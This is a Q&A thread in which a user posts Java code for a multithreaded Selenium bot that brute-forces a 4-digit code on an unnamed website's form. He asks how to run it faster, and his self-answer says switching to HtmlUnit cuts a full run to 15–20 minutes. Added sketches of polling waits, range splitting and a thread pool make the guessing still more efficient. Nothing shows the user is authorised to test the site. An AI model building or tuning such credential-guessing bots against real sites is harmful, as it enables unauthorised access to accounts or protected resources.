Hi everyone! I have just created a brute-force bot that uses WebDriver and multithreading to brute-force a 4-digit code. Four digits means a range of possible String values from 0000 to 9999. In my case, at least 7 seconds pass between clicking the "submit" button and the client getting a response from the server, so I decided to use Thread.sleep(7200) to let the response page load fully. Then I found out that I couldn't afford to wait 9999 × 7.5 seconds (roughly 21 hours) for the task to finish, so I had to use multithreading.

I have a quad-core AMD machine with 1 virtual core per hardware core, which lets me run 8 threads simultaneously. So I split the whole job of 9999 combinations equally between 8 threads: each got 1249 combinations, plus a remainder thread that starts at the very end. Now the job finishes in 1.5 hours (because the right code happens to be in the middle of the range). That is much better, BUT it could be even better! You know, the Thread.sleep(7500) is a pure waste of time. My machine could be switching to other threads which are wait() because of the limited number of hardware cores. How can I do this? Any ideas?

Below are two classes to represent my architecture approach:

public class BruteforceBot extends Thread {

    // All the necessary implementation, blah-blah

    public void run() {
        bruteforce();
    }

    private void bruteforce() {
        initDriver();
        int counter = start;
        while (counter <= finish) {
            try {
                webDriver.get(gatewayURL);                
                webDriver.findElement(By.name("code")).sendKeys(codes.get(counter));              
                webDriver.findElement(By.name("code")).submit();                
                Thread.sleep(7200);
                String textFound = "";                
                try {
                    do {
                        textFound = Jsoup.parse(webDriver.getPageSource()).text();
                        //we need to be sure that the page is fully loaded
                    } while (textFound.contains("XXXXXXXXXXXXX"));
                } catch (org.openqa.selenium.JavascriptException je) {
                    System.err.println("JavascriptException: TypeError: "
                            + "document.documentElement is null");
                    continue;
                }
                // Test if the page returns XXXXXXXXXXXXX below
                if (textFound.contains("XXXXXXXXXXXXXXXx") && !textFound.contains("YYYYYYY")) {
                    System.out.println("Not " + codes.get(counter));
                    counter++;
                    // Test if the page contains "YYYYYYY" string below
                } else if (textFound.contains("YYYYYYY")) {
                    System.out.println("Correct Code is " + codes.get(counter));
                    botLogger.writeTheLogToFile("We have found it: " + textFound
                            + " ... at the code of " + codes.get(counter));
                    break;
                    // Test if any other case of response below
                } else {
                    System.out.println("WTF?");
                    botLogger.writeTheLogToFile("Strange response for code "
                            + codes.get(counter));
                    continue;
                }
            } catch (InterruptedException intrrEx) {
                System.err.println("Interrupted exception: ");
                intrrEx.printStackTrace();
            }
        }
        destroyDriver();
    } // end of bruteforce() method
}
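
The fixed Thread.sleep(7200) followed by the page-source loop in the method above amounts to a hand-rolled wait. A minimal sketch of the same idea as a polling wait with a timeout, using only the JDK, might look like the following. `PollingWait` and its parameters are hypothetical names that are not part of the original code, and the condition lambda stands in for a check such as "the page text no longer contains the loading marker". Selenium also provides an explicit-wait class, WebDriverWait, intended for this kind of check.

```java
import java.time.Duration;
import java.util.function.BooleanSupplier;

/** Hypothetical helper: polls a condition instead of sleeping for a fixed time. */
final class PollingWait {

    /**
     * Returns true as soon as the condition holds, or false if the timeout
     * expires (or the thread is interrupted) before that happens.
     */
    static boolean until(BooleanSupplier condition, Duration timeout, Duration interval) {
        long deadline = System.nanoTime() + timeout.toNanos();
        while (!condition.getAsBoolean()) {
            if (System.nanoTime() - deadline >= 0) {
                return false; // gave up: the condition never became true in time
            }
            try {
                // The sleeping thread is blocked, so the core is free for other threads.
                Thread.sleep(interval.toMillis());
            } catch (InterruptedException e) {
                Thread.currentThread().interrupt(); // preserve the interrupt flag
                return false;
            }
        }
        return true;
    }

    public static void main(String[] args) {
        // Assumption: a simulated "server" that becomes ready after 300 ms.
        final long readyAt = System.currentTimeMillis() + 300;
        boolean loaded = until(() -> System.currentTimeMillis() >= readyAt,
                Duration.ofSeconds(2), Duration.ofMillis(50));
        System.out.println("loaded = " + loaded);
    }
}
```

With a helper like this, a fast response is picked up within one polling interval and a slow one is still bounded by the timeout, instead of every attempt paying the full fixed delay.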

And

public class ThreadMaster {

    // All the necessary implementation, blah-blah

    public ThreadMaster(int amountOfThreadsArgument,
            ArrayList<String> customCodes) {
        this();
        this.codes = customCodes;
        this.amountOfThreads = amountOfThreadsArgument;
        this.lastCodeIndex = codes.size() - 1;
        this.remainderThread = codes.size() % amountOfThreads;
        this.scopeOfWorkForASingleThread
                = codes.size() / amountOfThreads;
    }

    public static void runThreads() {
        do {
            bots = new BruteforceBot[amountOfThreads];
            System.out.println("Bots array is populated");
        } while (bots.length != amountOfThreads);
        for (int j = 0; j <= amountOfThreads - 1;) {
            int finish = start + scopeOfWorkForASingleThread;
            try {
                bots[j] = new BruteforceBot(start, finish, codes);
            } catch (Exception e) {
                System.err.println("Putting a bot into the threads array failed");
                continue;
            }
            bots[j].start();
            start = finish;
            j++;
        }
        try {
            for (int j = 0; j <= amountOfThreads - 1; j++) {
                bots[j].join();
            }
        } catch (InterruptedException ie) {
            System.err.println("InterruptedException has occurred "
                    + "while a Bot was joining a thread ...");
            ie.printStackTrace();
        }
        // If any codes still remain to be tested,
        // this last bot/thread will take care of them
        if (remainderThread != 0) {
            try {
                int remainderStart = lastCodeIndex - remainderThread;
                int remainderFinish = lastCodeIndex;
                BruteforceBot remainderBot
                        = new BruteforceBot(remainderStart, remainderFinish, codes);
                remainderBot.start();
                remainderBot.join();
            } catch (InterruptedException ie) {
                System.err.println("The remainder Bot has failed to "
                        + "create or start or join a thread ...");
            }
        }
    }
}
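
In the code above, each bot loops while `counter <= finish` and the next bot starts at `finish`, so the boundary codes appear to be tried twice, and the remainder only starts after all other bots have joined. A minimal sketch of an alternative split into contiguous half-open ranges, where the leftover items are spread over the first few ranges instead of going to a separate thread, could look like this. `RangeSplitter` is a hypothetical helper, not part of the original code.

```java
import java.util.ArrayList;
import java.util.List;

/** Hypothetical helper: splits indices 0..total-1 into contiguous half-open ranges. */
final class RangeSplitter {

    /**
     * Returns {start, endExclusive} pairs. The first (total % parts) ranges
     * receive one extra item, so no separate remainder range is needed.
     */
    static List<int[]> split(int total, int parts) {
        if (total < 0 || parts <= 0) {
            throw new IllegalArgumentException("total must be >= 0 and parts > 0");
        }
        List<int[]> ranges = new ArrayList<>();
        int base = total / parts;   // minimum size of every range
        int extra = total % parts;  // number of ranges that get one more item
        int start = 0;
        for (int i = 0; i < parts; i++) {
            int size = base + (i < extra ? 1 : 0);
            ranges.add(new int[] {start, start + size});
            start += size;
        }
        return ranges;
    }

    public static void main(String[] args) {
        // Assumption: 10,000 codes (0000 to 9999) shared between 8 workers.
        for (int[] r : split(10_000, 8)) {
            System.out.printf("%04d .. %04d%n", r[0], r[1] - 1);
        }
    }
}
```

A worker would then iterate with `for (int i = range[0]; i < range[1]; i++)`, which keeps every index in exactly one range.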

I need your advice on how to improve the architecture of this app so that it runs successfully with, say, 20 threads instead of 8. My problem is this: when I simply remove Thread.sleep(7200) and run 20 Thread instances instead of 8, each thread constantly fails to get a response from the server, because it no longer waits the 7 seconds for it to arrive. As a result, performance doesn't just drop, it falls to zero. Which approach would you choose in this case?

P.S.: I set the number of threads in the main() method:

public static void main(String[] args)
        throws InterruptedException, org.openqa.selenium.SessionNotCreatedException {
    System.setProperty("webdriver.gecko.driver", "lib/geckodriver.exe");
    ThreadMaster tm = new ThreadMaster(8, new CodesGenerator().getListOfCodesFourDigits());
    tm.runThreads();
}

Václav
  • 'Thread.sleep(7500) is a pure waste of time. My machine could be switching to other threads which are wait()' I don't understand that. If a thread elects to Sleep(), the OS blocks it and frees up the core it was running on. If another thread is ready, it will be 'immediately' dispatched onto the now-free core. If you have a Sleep(7200) call in your thread code, then you could run 800 threads, no problem, and you would not notice any slowdown. – Martin James Jul 14 '17 at 11:03
  • @MartinJames, unfortunately, `sleep()` does not release the lock on its resources. It was discussed [here](https://stackoverflow.com/questions/1036754/difference-between-wait-and-sleep). During Thread.sleep(), the physical core will not be released, but it will be performing the Thread.sleep(). Only wait() can help here, as far as I can see. – Václav Jul 14 '17 at 11:46
  • @MartinJames, do you think it is because geckodriver.exe and chromedriver.exe are both separate Windows programs that have little to do with my Java app and occupy my threads? Perhaps it is not a Java multithreading question but a Windows multiprogramming one... Anyway, my hope of getting advice is still alive :) – Václav Jul 14 '17 at 12:19
  • 'During Thread.sleep(), the physical core will not be released, but it will be performing the Thread.sleep().' - that is completely incorrect. – Martin James Jul 14 '17 at 14:00
  • @MartinJames, you are totally right! "If a thread elects to Sleep(), the OS blocks it and frees up the core it was running on" - this is right! I was wrong. I have just run an experiment with 800 threads printing A, B and C with Thread.sleep(20000) between each letter, and yes, all 800 A letters were printed at once. So why does my app lag so badly with more than 8 threads? Is it because a Selenium WebDriver instance is also a thread, and even a separate process in the OS? – Václav Jul 14 '17 at 14:13
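
The experiment described in the last comment can be reproduced with a short sketch along these lines. The class name and the shorter sleep time are assumptions chosen for illustration, not the code that was actually run. If sleeping threads occupied a core, 800 threads sleeping for 2 seconds each would take far longer than 2 seconds in total on an 8-thread machine.

```java
import java.util.ArrayList;
import java.util.List;

/** Hypothetical reproduction of the "many sleeping threads" experiment. */
final class SleepExperiment {

    /**
     * Starts threadCount threads that each sleep for sleepMillis, waits for
     * all of them, and returns the total elapsed wall-clock time in ms
     * (or -1 if the calling thread was interrupted while waiting).
     */
    static long run(int threadCount, long sleepMillis) {
        List<Thread> threads = new ArrayList<>();
        long begin = System.nanoTime();
        for (int i = 0; i < threadCount; i++) {
            Thread t = new Thread(() -> {
                try {
                    Thread.sleep(sleepMillis); // blocked: no core is used while sleeping
                } catch (InterruptedException e) {
                    Thread.currentThread().interrupt();
                }
            });
            threads.add(t);
            t.start();
        }
        for (Thread t : threads) {
            try {
                t.join();
            } catch (InterruptedException e) {
                Thread.currentThread().interrupt();
                return -1;
            }
        }
        return (System.nanoTime() - begin) / 1_000_000;
    }

    public static void main(String[] args) {
        long elapsed = run(800, 2_000);
        System.out.println("800 sleeping threads finished in " + elapsed + " ms");
    }
}
```

The elapsed time should stay close to a single sleep interval plus thread start-up overhead, which matches the observation that all 800 letters were printed at once.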

1 Answer

Okay, since nobody can wait for my question to get a response, I decided to answer it myself as soon as I could (now!). If you want to increase the performance of a Selenium WebDriver-based brute-force bot like this one, you need to stop using Selenium WebDriver. The WebDriver is a separate process in the OS; it does not even need a JVM to run. So every single instance of the bot was not only a thread managed by my JVM but also a Windows process! This is why I could hardly use my PC when the app was running with more than 8 threads (each thread launched a Windows process, geckodriver.exe or chromedriver.exe).

What you really need to do to speed up such a brute-force bot is to use HtmlUnit instead of Selenium! HtmlUnit is a pure Java framework; its jar can be found on Maven Central, and it can be added as a dependency in your pom.xml. This way, brute-forcing a 4-digit code takes 15 to 20 minutes, even though the website takes at least 7 seconds to respond to each attempt. For comparison, with Selenium WebDriver the task took 90 minutes. And thanks again to @MartinJames, who pointed out that Thread.sleep() does let the hardware core switch to other threads!
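
Independently of which client performs the request, each attempt spends most of its time waiting on the server, so the fixed per-thread ranges could also be replaced by a thread pool that takes one candidate at a time and stops doing real work once a match is found. The following is a minimal sketch under that assumption, using only the JDK. `PooledSearch`, `findFirstMatch` and `simulatedAttempt` are hypothetical names, and the `attempt` predicate is a stand-in for the real request, which is not shown here.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Optional;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.atomic.AtomicReference;
import java.util.function.Predicate;

/** Hypothetical sketch: a fixed thread pool that tries candidates until one matches. */
final class PooledSearch {

    static Optional<String> findFirstMatch(List<String> candidates, int threads,
            Predicate<String> attempt) {
        ExecutorService pool = Executors.newFixedThreadPool(threads);
        AtomicReference<String> found = new AtomicReference<>();
        for (String candidate : candidates) {
            pool.execute(() -> {
                if (found.get() != null) {
                    return; // a match already exists, skip the remaining work
                }
                if (attempt.test(candidate)) {
                    found.compareAndSet(null, candidate);
                }
            });
        }
        pool.shutdown(); // accept no new tasks, let queued ones finish
        try {
            pool.awaitTermination(1, TimeUnit.DAYS);
        } catch (InterruptedException e) {
            pool.shutdownNow();
            Thread.currentThread().interrupt();
        }
        return Optional.ofNullable(found.get());
    }

    /** Assumption: simulates a slow server by sleeping before answering. */
    static boolean simulatedAttempt(String candidate, String secret) {
        try {
            Thread.sleep(5);
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
            return false;
        }
        return candidate.equals(secret);
    }

    public static void main(String[] args) {
        List<String> codes = new ArrayList<>();
        for (int i = 0; i < 10_000; i++) {
            codes.add(String.format("%04d", i));
        }
        Optional<String> result =
                findFirstMatch(codes, 20, c -> simulatedAttempt(c, "4711"));
        System.out.println(result.orElse("no match"));
    }
}
```

Because idle workers simply pick up the next candidate, no thread sits unused while another still has a long range left, and the pool size can be tuned without recomputing ranges.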

Václav